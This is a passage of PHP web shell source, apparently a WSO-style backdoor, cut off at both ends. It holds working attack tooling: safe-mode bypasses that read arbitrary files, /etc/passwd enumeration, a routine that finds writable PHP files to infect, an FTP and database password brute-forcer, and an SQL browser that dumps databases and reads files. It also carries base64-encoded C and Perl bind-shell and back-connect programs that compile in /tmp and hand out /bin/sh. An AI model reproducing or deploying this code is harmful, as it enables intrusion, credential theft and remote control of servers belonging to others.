if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>â³ Paste</option>"; echo "</select> "; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; echo "<input type='submit' value='>>'></td></tr></form></table></div>"; hardFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo '<h1>String conversions</h1><div class=content>'; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; if(!empty($_POST['p1'])) { if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo"</pre></div><br><h1>Search files:</h1><div class=content> <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr> <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr> <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr> <tr><td></td><td><input type='submit' value='>>'></td></tr> </table></form>"; function hardRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $â) { if(@is_dir($â)){ if($path!=$â) hardRecursiveGlob($â); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>"; } } } } if(@$_POST['p3']) hardRecursiveGlob($_POST['c']); echo "</div><br><h1>Search for hash:</h1><div class=content> <form method='post' target='_blank' name='hf'> <input type='text' name='hash' style='width:200px;'><br> <input type='hidden' name='act' value='find'/> <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br> <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br> <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br> <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br> <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br> </form></div>"; hardFooter(); } function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."\n"; break; case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."\n"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo '<h1>Safe mode bypass</h1><div class=content>'; echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; if($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; echo '</div>'; hardFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') hardHeader(); echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; hardFooter(); } function actionInfect() { hardHeader(); echo '<h1>Infect</h1><div class=content>'; if($_POST['p1'] == 'infect') { $target=$_SERVER['DOCUMENT_ROOT']; function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4); if($nFile == ".php" ){ if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ echo "$file<br>"; $i++; } } } echo "<font color=red size=14>$i</font>"; }else{ echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>'; } hardFooter(); } function actionBruteforce() { hardHeader(); if( isset($_POST['proto']) ) { echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; } echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<input type=hidden name=ne value="">' .'<span>Server:port</span></td>' .'<td><input type=text name=server value="127.0.0.1"></td></tr>' .'<tr><td><span>Brute type</span></td>' .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .'<td><input type=text name=login value="root"></td></tr>' .'<tr><td><span>Dictionary</span></td>' .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; echo '</div><br>'; hardFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table hard2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($â = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } $columns = array(); foreach($â as $k=>$v) { if($v === null) $â[$k] = "NULL"; elseif(is_int($v)) $â[$k] = $v; else $â[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')'; $head = false; } else $sql .= "\n\t,(".implode(", ", $â).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($â = $this->fetch()) { $columns = array(); foreach($â as $k=>$v) { $â[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } hardHeader(); echo " <h1>Sql browser</h1><div class=content> <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> <input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> <td><select name='type'><option value='mysql' "; if(@$_POST['type']=='mysql')echo 'selected'; echo ">MySql</option><option value='pgsql' "; if(@$_POST['type']=='pgsql')echo 'selected'; echo ">PostgreSql</option></select></td> <td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td> <td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td> <td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while($â = $db->fetch()) { list($key, $value) = each($â); echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; } echo '</select>'; } else echo $tmp; }else echo $tmp; echo "</td> <td><input type=submit value='>>' onclick='fs(d.sf);'></td> <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> </tr> </table> <script> s_db='".@addslashes($_POST['sql_base'])."'; function fs(f) { if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; if(f.p1) f.p1.value=''; if(f.p2) f.p2.value=''; if(f.p3) f.p3.value=''; } } function st(t,l) { d.sf.p1.value = 'select'; d.sf.p2.value = t; if(l && d.sf.p3) d.sf.p3.value = l; d.sf.submit(); } function is() { for(i=0;i<d.sf.elements['tbl[]'].length;++i) d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; } </script>"; if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while($â = $db->fetch($tbls_res)) { list($key, $value) = each($â); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; echo " of $pages"; if($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>"; if($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "<br><br>"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo '<table width=100% cellspacing=1 cellpadding=2 class=main>'; $line = 1; while($â = $db->fetch()) { if(!$title) { echo '<tr>'; foreach($â as $key => $value) echo '<th>'.$key.'</th>'; reset($â); $title=true; echo '</tr><tr>'; $line = 2; } echo '<tr class="l'.$line.'">'; $line = $line==1?2:1; foreach($â as $key => $value) { if($value == null) echo '<td><i>null</i></td>'; else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; } echo '</tr>'; } echo '</table>'; } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; } } echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']); echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; } } else { echo htmlspecialchars($db->error()); } echo '</div>'; hardFooter(); } function actionNetwork() { hardHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content> <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'> <span>Bind port to /bin/sh</span><br/> Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'> </form> <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'> <span>Back-connect to</span><br/> Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'> </form><br>"; if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $â = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>"; } if($_POST['p1'] 